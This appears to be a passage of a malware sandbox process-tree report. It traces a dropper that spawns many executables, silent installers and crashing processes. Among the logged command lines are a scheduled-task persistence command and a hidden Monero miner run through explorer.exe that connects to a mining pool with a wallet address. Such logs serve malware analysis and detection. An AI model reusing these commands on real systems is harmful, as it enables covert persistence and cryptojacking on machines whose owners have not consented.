C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 68013⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5048
-
-
-
C:\Program Files (x86)\Search Awesome\setup.exe"C:\Program Files (x86)\Search Awesome\setup.exe" -in12⤵
- Executes dropped EXE
PID:4676 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 63213⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1532
-
-
-
-
C:\Program Files (x86)\FreeVPN\FreeVPN.exe"C:\Program Files (x86)\FreeVPN\FreeVPN.exe" -in11⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2252
-
-
C:\Program Files (x86)\FreeVPN\FreeVPN.exe"C:\Program Files (x86)\FreeVPN\FreeVPN.exe"11⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2824 -
C:\Windows\SysWOW64\cmd.execmd.exe /c chcp 65001 > nul & cmd.exe /c netsh wlan show interfaces > openvpn\dat\tmp_check_WiFi.dat12⤵PID:2988
-
C:\Windows\SysWOW64\chcp.comchcp 6500113⤵PID:5824
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 182412⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5600
-
-
-
C:\Program Files (x86)\FreeVPN\FreeVPN.exe"C:\Program Files (x86)\FreeVPN\FreeVPN.exe" -typ https://www.freevpn.win/download/thankyou.html?vcid=wda0e98dn41o9k9a2j7ngd88&txid=ba089faf82bb6c2191d0435eb2bc059a9d86922511⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1412 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.freevpn.win/download/thankyou.html?vcid=wda0e98dn41o9k9a2j7ngd88&txid=ba089faf82bb6c2191d0435eb2bc059a9d86922512⤵PID:3372
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff864cc46f8,0x7ff864cc4708,0x7ff864cc471813⤵PID:1336
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6324 /prefetch:810⤵PID:5144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14175196936682400171,12730334350699191083,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:110⤵PID:4356
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵PID:6344
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff864cc46f8,0x7ff864cc4708,0x7ff864cc471810⤵PID:6984
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514839⤵PID:2696
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff864cc46f8,0x7ff864cc4708,0x7ff864cc471810⤵PID:1756
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\62-f963f-176-c0ebf-ed30eec1a93f0\Xigysanupi.exe"C:\Users\Admin\AppData\Local\Temp\62-f963f-176-c0ebf-ed30eec1a93f0\Xigysanupi.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5760 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\benncbcz.3z3\GcleanerEU.exe /eufive & exit9⤵PID:2952
-
C:\Users\Admin\AppData\Local\Temp\benncbcz.3z3\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\benncbcz.3z3\GcleanerEU.exe /eufive10⤵
- Executes dropped EXE
PID:1380 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1380 -s 23611⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3800
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2xxviiuu.5e3\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:6372
-
C:\Users\Admin\AppData\Local\Temp\2xxviiuu.5e3\installer.exeC:\Users\Admin\AppData\Local\Temp\2xxviiuu.5e3\installer.exe /qn CAMPAIGN="654"10⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:6648 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\2xxviiuu.5e3\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\2xxviiuu.5e3\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630643576 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
- Enumerates connected drives
PID:2868
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\k0ohga1p.krw\anyname.exe & exit9⤵PID:7108
-
C:\Users\Admin\AppData\Local\Temp\k0ohga1p.krw\anyname.exeC:\Users\Admin\AppData\Local\Temp\k0ohga1p.krw\anyname.exe10⤵
- Executes dropped EXE
PID:6056 -
C:\Users\Admin\AppData\Local\Temp\k0ohga1p.krw\anyname.exe"C:\Users\Admin\AppData\Local\Temp\k0ohga1p.krw\anyname.exe" -u11⤵
- Executes dropped EXE
PID:2908
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rdrph1rk.1qs\BsInstFile.exe & exit9⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3136 -
C:\Users\Admin\AppData\Local\Temp\rdrph1rk.1qs\BsInstFile.exeC:\Users\Admin\AppData\Local\Temp\rdrph1rk.1qs\BsInstFile.exe10⤵
- Executes dropped EXE
PID:5420 -
C:\Users\Admin\AppData\Roaming\4616743.exe"C:\Users\Admin\AppData\Roaming\4616743.exe"11⤵
- Executes dropped EXE
PID:4892 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4892 -s 231212⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7012
-
-
-
C:\Users\Admin\AppData\Roaming\4590327.exe"C:\Users\Admin\AppData\Roaming\4590327.exe"11⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:1420
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x32jh3rc.mmp\askinstall52.exe & exit9⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5220 -
C:\Users\Admin\AppData\Local\Temp\x32jh3rc.mmp\askinstall52.exeC:\Users\Admin\AppData\Local\Temp\x32jh3rc.mmp\askinstall52.exe10⤵
- Executes dropped EXE
PID:5676 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5676 -s 190811⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6180
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qbixltax.hmc\Cleanpro13.exe & exit9⤵PID:2972
-
C:\Users\Admin\AppData\Local\Temp\qbixltax.hmc\Cleanpro13.exeC:\Users\Admin\AppData\Local\Temp\qbixltax.hmc\Cleanpro13.exe10⤵
- Executes dropped EXE
PID:1180 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 210811⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1908
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tlpft1gi.gtr\gcleaner.exe /mixfive & exit9⤵PID:1284
-
C:\Users\Admin\AppData\Local\Temp\tlpft1gi.gtr\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\tlpft1gi.gtr\gcleaner.exe /mixfive10⤵
- Executes dropped EXE
PID:2800 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2800 -s 23611⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6512
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mfau3ekz.0hn\autosubplayer.exe /S & exit9⤵
- Suspicious use of SetWindowsHookEx
PID:5900
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gzraebxa.znq\installer.exe /qn CAMPAIGN=654 & exit9⤵PID:6292
-
C:\Users\Admin\AppData\Local\Temp\gzraebxa.znq\installer.exeC:\Users\Admin\AppData\Local\Temp\gzraebxa.znq\installer.exe /qn CAMPAIGN=65410⤵
- Executes dropped EXE
PID:6664
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2y04kfit.zfq\app.exe /8-2222 & exit9⤵PID:6844
-
C:\Users\Admin\AppData\Local\Temp\2y04kfit.zfq\app.exeC:\Users\Admin\AppData\Local\Temp\2y04kfit.zfq\app.exe /8-222210⤵
- Executes dropped EXE
PID:6936 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6936 -s 24011⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:920
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri15af75ee9b.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Users\Admin\AppData\Local\Temp\7zS4A0355E3\Fri15af75ee9b.exeFri15af75ee9b.exe5⤵
- Executes dropped EXE
PID:3828 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3828 -s 2846⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1180
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1553f0ee90.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Users\Admin\AppData\Local\Temp\7zS4A0355E3\Fri1553f0ee90.exeFri1553f0ee90.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
PID:2096 -
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
PID:4548 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:4248
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:3552
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5376 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:6284
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:6556
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
- Executes dropped EXE
PID:6256
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:3228
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4460 -
C:\Users\Admin\AppData\Roaming\2902519.exe"C:\Users\Admin\AppData\Roaming\2902519.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5228 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5228 -s 22969⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5168
-
-
-
C:\Users\Admin\AppData\Roaming\5859906.exe"C:\Users\Admin\AppData\Roaming\5859906.exe"8⤵
- Executes dropped EXE
PID:5396
-
-
C:\Users\Admin\AppData\Roaming\8843710.exe"C:\Users\Admin\AppData\Roaming\8843710.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5568
-
-
C:\Users\Admin\AppData\Roaming\4447160.exe"C:\Users\Admin\AppData\Roaming\4447160.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
C:\Users\Admin\AppData\Roaming\1411151.exe"C:\Users\Admin\AppData\Roaming\1411151.exe"8⤵
- Executes dropped EXE
PID:1732
-
-
C:\Users\Admin\AppData\Roaming\3278603.exe"C:\Users\Admin\AppData\Roaming\3278603.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5600 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 22369⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2912
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:452 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 452 -s 17248⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5852
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
PID:3300 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3300 -s 6048⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5368
-
-
-
C:\Users\Admin\AppData\Local\Temp\Pubdate.exe"C:\Users\Admin\AppData\Local\Temp\Pubdate.exe"7⤵
- Executes dropped EXE
PID:5200 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 2968⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5748
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
PID:5404 -
C:\Users\Admin\AppData\Local\Temp\is-RFU76.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-RFU76.tmp\setup_2.tmp" /SL5="$301F0,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5680 -
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
PID:6104 -
C:\Users\Admin\AppData\Local\Temp\is-VD98S.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-VD98S.tmp\setup_2.tmp" /SL5="$401F0,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:5236
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵
- Executes dropped EXE
PID:5560 -
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵PID:5760
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
PID:5784
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5992
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c APPNAME7.exe4⤵PID:4496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri155442fc38b.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Users\Admin\AppData\Local\Temp\7zS4A0355E3\Fri155442fc38b.exeFri155442fc38b.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5112 -
C:\Users\Admin\AppData\Roaming\1279257.exe"C:\Users\Admin\AppData\Roaming\1279257.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2440 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2440 -s 23247⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5316
-
-
-
C:\Users\Admin\AppData\Roaming\5100481.exe"C:\Users\Admin\AppData\Roaming\5100481.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4968 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Suspicious behavior: SetClipboardViewer
PID:6116
-
-
-
C:\Users\Admin\AppData\Roaming\3233656.exe"C:\Users\Admin\AppData\Roaming\3233656.exe"6⤵
- Executes dropped EXE
PID:1368
-
-
C:\Users\Admin\AppData\Roaming\4158650.exe"C:\Users\Admin\AppData\Roaming\4158650.exe"6⤵
- Executes dropped EXE
PID:5220
-
-
C:\Users\Admin\AppData\Roaming\6723743.exe"C:\Users\Admin\AppData\Roaming\6723743.exe"6⤵
- Executes dropped EXE
PID:5444
-
-
C:\Users\Admin\AppData\Roaming\8817294.exe"C:\Users\Admin\AppData\Roaming\8817294.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5640 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5640 -s 24847⤵
- Program crash
PID:3136
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri156ec98815f89c.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4644
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4A0355E3\Fri156ec98815f89c.exeFri156ec98815f89c.exe1⤵
- Executes dropped EXE
PID:4972
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv hT4RkUrQU0KJr6hWfqbv1w.0.21⤵
- Modifies data under HKEY_USERS
PID:4656
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3828 -ip 38281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:344
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4448 -ip 44481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:960
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:724 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:556 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 556 -s 4523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5184
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 556 -ip 5561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2788
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 600 -p 452 -ip 4521⤵PID:5168
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3300 -ip 33001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5328
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5200 -ip 52001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5540
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5832 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:4468 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 4603⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5268
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4468 -ip 44681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3040
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 484 -p 2440 -ip 24401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5856
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 528 -p 5228 -ip 52281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5080
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5640 -ip 56401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5564
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5600 -ip 56001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2488
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1380 -ip 13801⤵PID:7012
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1256
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5480 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 554AA473A78E967818C049D270460EB0 C2⤵
- Loads dropped DLL
PID:5928
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 634FC8DA45FBB58EF3BE1C15C4F5CCD12⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:4204 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:6204
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 23C91A3102DEEB82CAC91DF5AFE242EB E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:1580
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5132 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:5540 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 4523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5888
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5540 -ip 55401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:668
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5676 -ip 56761⤵
